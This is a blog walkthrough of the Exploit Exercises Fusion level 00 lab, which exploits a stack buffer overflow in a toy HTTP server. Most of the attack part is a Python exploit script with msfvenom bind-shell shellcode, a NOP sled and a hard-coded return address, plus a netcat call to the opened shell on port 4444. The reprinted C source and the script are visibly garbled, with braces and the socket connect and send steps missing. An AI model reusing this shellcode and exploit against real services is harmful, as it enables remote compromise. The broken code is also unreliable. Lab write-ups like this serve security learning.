Exploit Exercise Binary Exploitation Fusion level 00

Posted by Suraj Singh on August 31, 2018 · 11 mins read
hii readers,

Welcome Again to Bitforestinfo Blog. Well, Today's Post is Really Going to be very Interesting Because Today I am going to share my walkthrough experience of Exploit Exercise Fusion level 00 Challenge.
So, Let's start.


This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
bad idea due to character restrictions due to realpath(). Instead, there is
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"    

int fix_path(char *path)
char resolved[128]

if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
strcpy(path, resolved);

char *parse_http_request()
char buffer[1024];
char *path;
char *q;

printf("[debug] buffer is at 0x%08x :-)\n", buffer);

if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

path = &buffer[4];
q = strchr(path, ' ');
if(! q) errx(0, "No protocol version specified");
*q++ = 0;
if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");


printf("trying to access %s\n", path);

return path;

int main(int argc, char **argv, char **envp)
int fd;
char *p;

background_process(NAME, UID, GID);
fd = serve_forever(PORT);


Source Code Description

After staring these codes for few minutes. My mind said that Its a server like program to process user provided http request. After execution of this program, it waits for new connection and after receiving a new connection.parse_http_request() routine gets active and In the end, fix_path() function. So, After Understand Program Behavoiur I started to search for Vulnerable codes and function.

Vulnerable codes

Set 1:[Not Sure]

path = &buffer[4];
q = strchr(path, ' ');
if(! q) errx(0, "No protocol version specified");
*q++ = 0; <---- May Be For Another Methods????

SET 2 <---[ Completely Sure]

if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
strcpy(path, resolved) 

Yes, Above code... Yes! These Codes  looks suspicious to me in first sight but To proceed further, first we need to conform vulnerability of these codes.  So,  After few testing procedures and gdb analysis, I conformed that the second set of code is vulnerable.

Function realpath() is a Vulnerable Function.

Testing Code

fusion@fusion:~$ cat try.c 
#include <stdio.h>
#include <string.h>

int main(){
char resolve[150];

if (realpath(" HTTP/1.1 aaaaaaaaaaa",resolve)==NULL){
printf("Fail %s\n", resolve);
return 0;


Analysis of above testing code is left over user to understand because this testing code is really very simple. You Just need to spend only few minutes to understand it completely.  Just run above codes. Hint : Buffer-overflow Vulnerability.

After few changes in testing codes I got below Error.

Gdb Output

Program received signal SIGSEGV, Segmentation fault.
0xcccccccc in ?? ()
(gdb) i r
eax 0x1 1
ecx 0xb7e568d0 -1209702192
edx 0xbffffa45 -1073743291
ebx 0xb7fceff4 -1208160268
esp 0xbffff8e0 0xbffff8e0
ebp 0xcccccccc 0xcccccccc
esi 0xbffffaf9 -1073743111
edi 0x8049f05 134520581
eip 0xcccccccc 0xcccccccc
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51


Now, I think its like a piece of cake to solve this challenge because we successfully detected vulnerability and All security features of these program is OFF. So, Here it's my Exploitation Codes.


# import modules
import socket
import struct
import os

# target configurations
TARGET_IP = raw_input("[*] Insert Machine Address [Default:] : ") or ''

# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Creating Socket ..."

# Socket File
sf = s.makefile('rb')

# Connect To Target

ebp = sf.read(len('[debug] buffer is at 0xbffff8f8 :-)\n'))
print ebp
ebp = ebp[ebp.find('0x'):-5]

print "[+] Generating payload..."
payload = ''
payload+= 'GET '

# generated From Msfvenom
# msfvenom -p linux/x86/shell_bind_tcp
buf = ""
buf += '\x90'*120 # NOP Sleds
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += "\xda\xcd\xb8\xbe\xd0\x1b\x82\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x14\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x5c"
buf += "\x25\x2a\x59\x57\x25\x1e\x1e\xc4\xc0\xa3\x29\x0b\xa4"
buf += "\xc2\xe4\x4b\x9e\x54\xa5\x23\x23\x69\x58\xef\x49\x79"
buf += "\x0b\x5f\x07\x98\xc1\x39\x4f\x96\x96\x4c\x2e\x2c\x24"
buf += "\x4a\x01\x4a\x87\xd2\x22\x23\x71\x1f\x24\xd0\x27\xf5"
buf += "\x1a\x8f\x1a\x89\x2c\x56\x5d\xe1\x81\x87\xee\x99\xb5"
buf += "\xf8\x72\x30\x28\x8e\x90\x92\xe7\x19\xb7\xa2\x03\xd7"
buf += "\xb8"
print "[+] Payload ready to dispatch."

# Trying To Find Offset
# 500 Words
# payload+= 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'

# Offset 139
print "[+] Assemble Payload"
payload+= '\x90'*135 # Nop Sled
payload+= 'b'*4 #struct.pack("I", 0xbffff8f8) # struct.pack("I", int(ebp)) # EBP
payload+= struct.pack("I", 0xbffff8dc+10) # 'aaaa' # this point is countering
payload+= buf
# Instruction Pointer ---|
payload+= '\x90'*(1000-(143+len(buf))) # Nop Sled <---|
payload+= ' HTTP/1.1\r\n'

print "[+] Payload Sent"
# Sending Payload

print "[+] Wait For Response"
print [sf.read(len('trying to access %s\n')+10)]
print "[-] If You Are Reading This Message Then Probably Exploit failed."
input("[-] Exit. Trying Again..")
print "[+] Starting Bind TCP Shell."
print "[+] Use Commands Carefully."
os.system('nc {} 4444'.format(TARGET_IP))

Yeah! We Won.

Feel Free To Comment below Appreciable Points.. Hahaha!